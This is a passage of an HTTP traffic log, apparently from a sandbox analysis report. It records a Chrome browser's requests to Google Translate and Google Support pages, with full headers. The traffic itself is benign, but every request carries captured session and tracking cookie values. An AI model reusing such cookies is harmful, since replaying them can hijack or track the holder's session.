en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=IjJo3fqvFr2f8tqOVnlEtvH1qF36zIe5ll_qjOOWqS9Q-bzPJo2ap-Ped9grk4Gv-oC8B_v11ePGTYeRUB6kQzvJQ6JVLXepmUep3gMmMRPDFSc3XWLaEkUe7m-hKQx9uU3hqJRxkHQQtQ8fYHLEzrBvLtV1y4W7bcAeH5X7c94
    Source: global trafficHTTP traffic detected: GET /_/TranslateWebserverUi/bscframe HTTP/1.1Host: translate.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "104.0.5112.81"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "6.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Chromium";v="104.0.5112.81", " Not A;Brand";v="99.0.0.0", "Google Chrome";v="104.0.5112.81"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://translate.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=IjJo3fqvFr2f8tqOVnlEtvH1qF36zIe5ll_qjOOWqS9Q-bzPJo2ap-Ped9grk4Gv-oC8B_v11ePGTYeRUB6kQzvJQ6JVLXepmUep3gMmMRPDFSc3XWLaEkUe7m-hKQx9uU3hqJRxkHQQtQ8fYHLEzrBvLtV1y4W7bcAeH5X7c94
    Source: global trafficHTTP traffic detected: GET /_/TranslateWebserverUi/manifest.json HTTP/1.1Host: translate.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-full-version-list: "Chromium";v="104.0.5112.81", " Not A;Brand";v="99.0.0.0", "Google Chrome";v="104.0.5112.81"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "104.0.5112.81"sec-ch-ua-platform-version: "6.0.0"sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-model: sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://translate.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=IjJo3fqvFr2f8tqOVnlEtvH1qF36zIe5ll_qjOOWqS9Q-bzPJo2ap-Ped9grk4Gv-oC8B_v11ePGTYeRUB6kQzvJQ6JVLXepmUep3gMmMRPDFSc3XWLaEkUe7m-hKQx9uU3hqJRxkHQQtQ8fYHLEzrBvLtV1y4W7bcAeH5X7c94; _ga=GA1.3.984793088.1679378232; _gid=GA1.3.1979254966.1679378232
    Source: global trafficHTTP traffic detected: GET /opensearch.xml?hl=en_US HTTP/1.1Host: translate.google.comConnection: keep-aliveSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=IjJo3fqvFr2f8tqOVnlEtvH1qF36zIe5ll_qjOOWqS9Q-bzPJo2ap-Ped9grk4Gv-oC8B_v11ePGTYeRUB6kQzvJQ6JVLXepmUep3gMmMRPDFSc3XWLaEkUe7m-hKQx9uU3hqJRxkHQQtQ8fYHLEzrBvLtV1y4W7bcAeH5X7c94
    Source: global trafficHTTP traffic detected: GET /?hl=en&tab=TT HTTP/1.1Host: translate.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "104.0.5112.81"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "6.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Chromium";v="104.0.5112.81", " Not A;Brand";v="99.0.0.0", "Google Chrome";v="104.0.5112.81"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=IjJo3fqvFr2f8tqOVnlEtvH1qF36zIe5ll_qjOOWqS9Q-bzPJo2ap-Ped9grk4Gv-oC8B_v11ePGTYeRUB6kQzvJQ6JVLXepmUep3gMmMRPDFSc3XWLaEkUe7m-hKQx9uU3hqJRxkHQQtQ8fYHLEzrBvLtV1y4W7bcAeH5X7c94; _ga=GA1.3.984793088.1679378232; _gid=GA1.3.1979254966.1679378232; OTZ=6951237_84_88_104280_84_446940
    Source: global trafficHTTP traffic detected: GET /_/TranslateWebserverUi/bscframe HTTP/1.1Host: translate.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "104.0.5112.81"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "6.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Chromium";v="104.0.5112.81", " Not A;Brand";v="99.0.0.0", "Google Chrome";v="104.0.5112.81"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://translate.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=IjJo3fqvFr2f8tqOVnlEtvH1qF36zIe5ll_qjOOWqS9Q-bzPJo2ap-Ped9grk4Gv-oC8B_v11ePGTYeRUB6kQzvJQ6JVLXepmUep3gMmMRPDFSc3XWLaEkUe7m-hKQx9uU3hqJRxkHQQtQ8fYHLEzrBvLtV1y4W7bcAeH5X7c94; _ga=GA1.3.984793088.1679378232; _gid=GA1.3.1979254966.1679378232; OTZ=6951237_84_88_104280_84_446940
    Source: global trafficHTTP traffic detected: GET /opensearch.xml?hl=en HTTP/1.1Host: translate.google.comConnection: keep-aliveSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=IjJo3fqvFr2f8tqOVnlEtvH1qF36zIe5ll_qjOOWqS9Q-bzPJo2ap-Ped9grk4Gv-oC8B_v11ePGTYeRUB6kQzvJQ6JVLXepmUep3gMmMRPDFSc3XWLaEkUe7m-hKQx9uU3hqJRxkHQQtQ8fYHLEzrBvLtV1y4W7bcAeH5X7c94
    Source: global trafficHTTP traffic detected: GET /about/?hl=en-US HTTP/1.1Host: translate.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "104.0.5112.81"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "6.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Chromium";v="104.0.5112.81", " Not A;Brand";v="99.0.0.0", "Google Chrome";v="104.0.5112.81"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=IjJo3fqvFr2f8tqOVnlEtvH1qF36zIe5ll_qjOOWqS9Q-bzPJo2ap-Ped9grk4Gv-oC8B_v11ePGTYeRUB6kQzvJQ6JVLXepmUep3gMmMRPDFSc3XWLaEkUe7m-hKQx9uU3hqJRxkHQQtQ8fYHLEzrBvLtV1y4W7bcAeH5X7c94; _ga=GA1.3.984793088.1679378232; _gid=GA1.3.1979254966.1679378232; OTZ=6951237_84_88_104280_84_446940
    Source: global trafficHTTP traffic detected: GET /about/static/compiled/index.min.css?cache=d2c5574 HTTP/1.1Host: translate.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-full-version-list: "Chromium";v="104.0.5112.81", " Not A;Brand";v="99.0.0.0", "Google Chrome";v="104.0.5112.81"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "104.0.5112.81"sec-ch-ua-platform-version: "6.0.0"sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-model: sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=IjJo3fqvFr2f8tqOVnlEtvH1qF36zIe5ll_qjOOWqS9Q-bzPJo2ap-Ped9grk4Gv-oC8B_v11ePGTYeRUB6kQzvJQ6JVLXepmUep3gMmMRPDFSc3XWLaEkUe7m-hKQx9uU3hqJRxkHQQtQ8fYHLEzrBvLtV1y4W7bcAeH5X7c94; _ga=GA1.3.984793088.1679378232; _gid=GA1.3.1979254966.1679378232; OTZ=6951237_84_88_104280_84_446940
    Source: global trafficHTTP traffic detected: GET /about/static/compiled/index.min.js?cache=2b0e134 HTTP/1.1Host: translate.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-full-version-list: "Chromium";v="104.0.5112.81", " Not A;Brand";v="99.0.0.0", "Google Chrome";v="104.0.5112.81"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "104.0.5112.81"sec-ch-ua-platform-version: "6.0.0"sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-model: sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=IjJo3fqvFr2f8tqOVnlEtvH1qF36zIe5ll_qjOOWqS9Q-bzPJo2ap-Ped9grk4Gv-oC8B_v11ePGTYeRUB6kQzvJQ6JVLXepmUep3gMmMRPDFSc3XWLaEkUe7m-hKQx9uU3hqJRxkHQQtQ8fYHLEzrBvLtV1y4W7bcAeH5X7c94; _ga=GA1.3.984793088.1679378232; _gid=GA1.3.1979254966.1679378232; OTZ=6951237_84_88_104280_84_446940
    Source: global trafficHTTP traffic detected: GET /about/static/img/glue-icons.svg HTTP/1.1Host: translate.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-full-version-list: "Chromium";v="104.0.5112.81", " Not A;Brand";v="99.0.0.0", "Google Chrome";v="104.0.5112.81"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "104.0.5112.81"sec-ch-ua-platform-version: "6.0.0"sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-model: sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=IjJo3fqvFr2f8tqOVnlEtvH1qF36zIe5ll_qjOOWqS9Q-bzPJo2ap-Ped9grk4Gv-oC8B_v11ePGTYeRUB6kQzvJQ6JVLXepmUep3gMmMRPDFSc3XWLaEkUe7m-hKQx9uU3hqJRxkHQQtQ8fYHLEzrBvLtV1y4W7bcAeH5X7c94; _ga=GA1.3.984793088.1679378232; _gid=GA1.3.1979254966.1679378232; OTZ=6951237_84_88_104280_84_446940
    Source: global trafficHTTP traffic detected: GET /about/static/img/glue-icons.svg HTTP/1.1Host: translate.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=IjJo3fqvFr2f8tqOVnlEtvH1qF36zIe5ll_qjOOWqS9Q-bzPJo2ap-Ped9grk4Gv-oC8B_v11ePGTYeRUB6kQzvJQ6JVLXepmUep3gMmMRPDFSc3XWLaEkUe7m-hKQx9uU3hqJRxkHQQtQ8fYHLEzrBvLtV1y4W7bcAeH5X7c94; _gid=GA1.3.1979254966.1679378232; OTZ=6951237_84_88_104280_84_446940; _ga=GA1.1.984793088.1679378232; _ga_YEQ7E396JC=GS1.1.1679378254.1.0.1679378254.0.0.0
    Source: global trafficHTTP traffic detected: GET /translate/?hl=en-US HTTP/1.1Host: support.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=IjJo3fqvFr2f8tqOVnlEtvH1qF36zIe5ll_qjOOWqS9Q-bzPJo2ap-Ped9grk4Gv-oC8B_v11ePGTYeRUB6kQzvJQ6JVLXepmUep3gMmMRPDFSc3XWLaEkUe7m-hKQx9uU3hqJRxkHQQtQ8fYHLEzrBvLtV1y4W7bcAeH5X7c94
    Source: global trafficHTTP traffic detected: GET /translate/?hl=en HTTP/1.1Host: support.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=IjJo3fqvFr2f8tqOVnlEtvH1qF36zIe5ll_qjOOWqS9Q-bzPJo2ap-Ped9grk4Gv-oC8B_v11ePGTYeRUB6kQzvJQ6JVLXepmUep3gMmMRPDFSc3XWLaEkUe7m-hKQx9uU3hqJRxkHQQtQ8fYHLEzrBvLtV1y4W7bcAeH5X7c94
    Source: global trafficHTTP traffic detected: GET /generate_204 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://support.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /widget/callout?prid=19022645&pgid=1151720448&puid=723e1a40d4cc6173&cce=1&dc=1&origin=https%3A%2F%2Fsupport.google.com&cn=callout&pid=117&spid=117&hl=en HTTP/1.1Host: ogs.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://support.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /images/hpp/gsa_super_g-64.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /gen_204?use_corp=on&atyp=i&zx=1679378264549&ogsr=1&ei=1tYYZLbOFJC7nsEPmYW9qA4&ct=7&cad=i&id=19022645&loc=undefined&prid=117&ogd=co.uk&ogprm=up&ap=1&vis=1 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://support.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /images/hpp/gsa_super_g-64.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: support.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://support.google.com/translate/?hl=enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; 